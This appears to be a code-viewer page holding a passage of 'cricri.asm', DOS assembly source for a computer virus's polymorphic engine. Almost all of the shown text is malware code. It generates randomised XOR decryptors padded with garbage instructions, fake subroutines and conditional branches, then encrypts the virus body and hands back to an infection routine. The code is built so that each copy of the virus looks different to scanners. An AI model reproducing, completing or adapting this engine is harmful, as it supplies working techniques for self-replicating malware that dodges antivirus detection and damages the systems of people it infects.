📄 cricri.asm
字号:
call get_rnd
and al,38h
mov byte ptr cs:[decrypt_register],al
;Chose segment registers for memory operations
call get_seg_reg
mov byte ptr cs:[address_seg_1],al
call get_seg_reg
mov byte ptr cs:[address_seg_2],al
;Fill our buffer with garbage
mov ax,cs
mov ds,ax
mov es,ax
mov di,offset virus_copy
push di
mov cx,decryptor
cld
fill_garbage:
call get_rnd
stosb
loop fill_garbage
pop di
;Now es:di points to the buffer were engine put polymorphic code
choose_type:
;Select the type of filler
mov ax,(end_step_table-step_table)/2
call rand_in_range
;Avoid same types in a row
cmp ax,word ptr cs:[last_step_type]
je choose_type
mov word ptr cs:[last_step_type],ax
add ax,ax
mov bx,ax
cld
call word ptr cs:[step_table+bx]
cmp byte ptr cs:[decrypt_pointer],05h
jne choose_type
;Generate some garbage
call rnd_garbage
;Generate a jump to virus body
mov al,0E9h
stosb
mov ax,decryptor
mov bx,di
sub bx,offset virus_copy-02h
sub ax,bx
stosw
;Store random crypt value
get_rnd_key:
call get_rnd
or al,al
jz get_rnd_key
xchg bx,ax
mov byte ptr cs:[clave_crypt],bl
;Copy virus body to the working area while encrypt
mov si,offset virus_body
mov di,offset virus_copy+decryptor
mov cx,lenvir-decryptor-01h
cld
load_crypt:
lodsb
xor al,bl
stosb
loop load_crypt
;Store key without encryption
movsb
;Restore all regs and return to infection routine
call pop_all
ret
;-----------------------------------------------------------------------------
;Get a valid opcode for memory operations
;-----------------------------------------------------------------------------
get_seg_reg:
cmp byte ptr cs:[prog_type],"C"
je use_ds_es
mov al,2Eh
ret
use_ds_es:
call get_rnd
and al,18h
cmp al,10h
je get_seg_reg
or al,26h
ret
;-----------------------------------------------------------------------------
;Generate next decryptor instruction
;-----------------------------------------------------------------------------
next_decryptor:
;Next instruction counter
inc byte ptr cs:[decrypt_pointer]
;Check if there is a subroutine witch contains next decryptor instruction
cmp word ptr cs:[decrypt_sub],0000h
je build_now
;If so build a call instruction to that subroutine
call do_call_decryptor
ret
build_now:
;Else get next instruction to build
mov bl,byte ptr cs:[decrypt_pointer]
;Generate decryption instructions just into subroutines
cmp bl,03h
jne entry_from_sub
;No instruction was created so restore old pointer
dec byte ptr cs:[decrypt_pointer]
ret
entry_from_sub:
;Entry point if calling from decryptor subroutine building
xor bh,bh
add bx,bx
;Build instruction
call word ptr cs:[instruction_table+bx]
ret
;-----------------------------------------------------------------------------
;Get delta offset
;-----------------------------------------------------------------------------
inst_get_delta:
;Decode a call to next instruction and pop bp
push di
mov ax,00E8h
stosw
mov ax,5D00h
stosw
;Generate some garbage
call rnd_garbage
;Decode a sub bp
mov ax,0ED81h
stosw
;Store address of label
pop ax
sub ax,offset virus_copy-0103h
no_sub_psp:
stosw
ret
;-----------------------------------------------------------------------------
;Load counter register
;-----------------------------------------------------------------------------
inst_load_counter:
mov al,0BEh
add al,byte ptr cs:[address_register]
stosb
;Store size of encrypted data
mov ax,lenvir-decryptor-01h
stosw
ret
;-----------------------------------------------------------------------------
;Load pointer to encrypted data
;-----------------------------------------------------------------------------
inst_load_pointer:
;Load di as pointer
mov al,0BFh
sub al,byte ptr cs:[address_register]
stosb
;Store offset position of encrypted data
mov ax,offset virus_body
stosw
;Generate garbage in some cases
call rnd_garbage
;Generate add reg,bp
mov ch,byte ptr cs:[address_register]
mov cl,03h
rol ch,cl
mov ax,0FD03h
sub ah,ch
stosw
ret
;-----------------------------------------------------------------------------
;Decrypt one byte from encrypted data
;-----------------------------------------------------------------------------
inst_decrypt_one:
;Decode a mov reg,byte ptr cs:[key][bp]
mov al,byte ptr cs:[address_seg_1]
mov ah,8Ah
stosw
mov al,byte ptr cs:[decrypt_register]
or al,86h
stosb
;Store position of encryption key
mov ax,offset clave_crypt
stosw
;Decode a xor byte ptr cs:[si],reg
mov al,byte ptr cs:[address_seg_2]
mov ah,30h
stosw
mov al,byte ptr cs:[decrypt_register]
or al,05h
sub al,byte ptr cs:[address_register]
stosb
ret
;-----------------------------------------------------------------------------
;Increment pointer to encrypted zone
;-----------------------------------------------------------------------------
inst_inc_pointer:
mov al,47h
sub al,byte ptr cs:[address_register]
stosb
ret
;-----------------------------------------------------------------------------
;Decrement counter and loop
;-----------------------------------------------------------------------------
inst_dec_loop:
;Decode a dec reg instruction
mov al,4Eh
add al,byte ptr cs:[address_register]
stosb
;Decode a jz
mov al,74h
stosb
push di
inc di
;Generate some garbage instructions
call rnd_garbage
;Decode a jmp to loop instruction
mov al,0E9h
stosb
mov ax,word ptr cs:[address_loop]
sub ax,di
dec ax
dec ax
stosw
;Generate some garbage instructions
call rnd_garbage
;Store jz displacement
mov ax,di
pop di
push ax
sub ax,di
dec ax
stosb
pop di
ret
;-----------------------------------------------------------------------------
;Generate some garbage instructions if rnd
;-----------------------------------------------------------------------------
rnd_garbage:
call get_rnd
and al,01h
jz do_rnd_garbage
ret
do_rnd_garbage:
call g_generator
ret
;-----------------------------------------------------------------------------
;Generate a push reg and garbage and pop reg
;-----------------------------------------------------------------------------
do_push_g_pop:
;Build a random push pop
call do_push_pop
;Get pop instruction
dec di
mov al,byte ptr cs:[di+00h]
push ax
call g_generator
pop ax
stosb
ret
;-----------------------------------------------------------------------------
;Generate a subroutine witch contains garbage code.
;-----------------------------------------------------------------------------
do_subroutine:
cmp word ptr cs:[last_subroutine],0000h
je create_routine
ret
create_routine:
;Generate a jump instruction
mov al,0E9h
stosb
;Save address for jump construction
push di
;Save address of subroutine
mov word ptr cs:[last_subroutine],di
;Get subroutine address
inc di
inc di
;Generate some garbage code
call g_generator
;Insert ret instruction
mov al,0C3h
stosb
;Store jump displacement
mov ax,di
pop di
push ax
sub ax,di
dec ax
dec ax
stosw
pop di
ret
;-----------------------------------------------------------------------------
;Generate a subroutine witch contains one decryptor instruction
;-----------------------------------------------------------------------------
sub_decryptor:
cmp word ptr cs:[decrypt_sub],0000h
je ok_subroutine
ret
ok_subroutine:
;Do not generate the loop branch into a subroutine
mov bl,byte ptr cs:[decrypt_pointer]
inc bl
cmp bl,05h
jne no_loop_sub
ret
no_loop_sub:
;Generate a jump instruction
mov al,0E9h
stosb
;Save address for jump construction
push di
;Save address of subroutine
mov word ptr cs:[decrypt_sub],di
inc di
inc di
push bx
call rnd_garbage
pop bx
call entry_from_sub
call rnd_garbage
build_return:
;Insert ret instruction
mov al,0C3h
stosb
;Store jump displacement
mov ax,di
pop di
push ax
sub ax,di
dec ax
dec ax
stosw
pop di
ret
;-----------------------------------------------------------------------------
;Generate a call instruction to a subroutine witch contains
;next decryptor instruction
;-----------------------------------------------------------------------------
do_call_decryptor:
cmp byte ptr cs:[decrypt_pointer],03h
jne no_store_call
;Save position
mov word ptr cs:[address_loop],di
no_store_call:
;Build a call to our subroutine
mov al,0E8h
stosb
mov ax,word ptr cs:[decrypt_sub]
sub ax,di
stosw
;Do not use this subrotine again
mov word ptr cs:[decrypt_sub],0000h
ret
;-----------------------------------------------------------------------------
;Generate a call instruction to a subroutine witch some garbage code
;-----------------------------------------------------------------------------
do_call_garbage:
mov cx,word ptr cs:[last_subroutine]
;Check if there is a subroutine to call
or cx,cx
jnz ok_call
;No, so exit
ret
ok_call:
;Build a call to our garbage subroutine
mov al,0E8h
stosb
mov ax,cx
sub ax,di
stosw
;Do not use this subrotine again
mov word ptr cs:[last_subroutine],0000h
ret
;-----------------------------------------------------------------------------
;Generate a branch followed by some garbage code
;-----------------------------------------------------------------------------
do_branch:
;Generate a random conditional jump instruction
call get_rnd
and al,07h
or al,70h
stosb
;Save address for jump construction
push di
;Get subroutine address
inc di
;Generate some garbage code
call g_generator
;Store jump displacement
mov ax,di
pop di
push ax
sub ax,di
dec ax
stosb
pop di
ret
;-----------------------------------------------------------------------------
;Lay down between 2 and 5 filler opcodes selected from the available
;types
;-----------------------------------------------------------------------------
g_generator:
;Get a random number for fill count
call get_rnd
and ax,03h
;Min 2, max 5 opcodes
inc ax
inc ax
next_fill:
push ax
new_fill:
;Select the type of filler
mov ax,(end_op_table-op_table)/2
call rand_in_range
;Avoid same types in a row
cmp ax,word ptr cs:[last_fill_type]
je new_fill
mov word ptr cs:[last_fill_type],ax
add ax,ax
mov bx,ax
call word ptr cs:[op_table+bx]
pop ax
dec ax
jnz next_fill
ret
;-----------------------------------------------------------------------------
;Makes an opcode of type mov reg,immediate value
;either 8 or 16 bit value
;but never ax or al or sp,di,si or bp
;-----------------------------------------------------------------------------
move_imm:
call get_rnd
;Get a reggie
and al,0Fh
;Make it a mov reg,
or al,0B0h
test al,00001000b
jz is_8bit_mov
;Make it ax,bx cx or dx
and al,11111011b
mov ah,al
and ah,03h
;Not ax or al
jz move_imm
stosb
call rand_16
stosw
ret
is_8bit_mov:
mov bh,al
;Is al?
and bh,07h
;Yeah bomb
jz move_imm
stosb
call get_rnd
stosb
ret
;-----------------------------------------------------------------------------
;Now we knock boots with mov reg,reg's
;but never to al or ax.
;-----------------------------------------------------------------------------
move_with_reg:
call rand_16
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -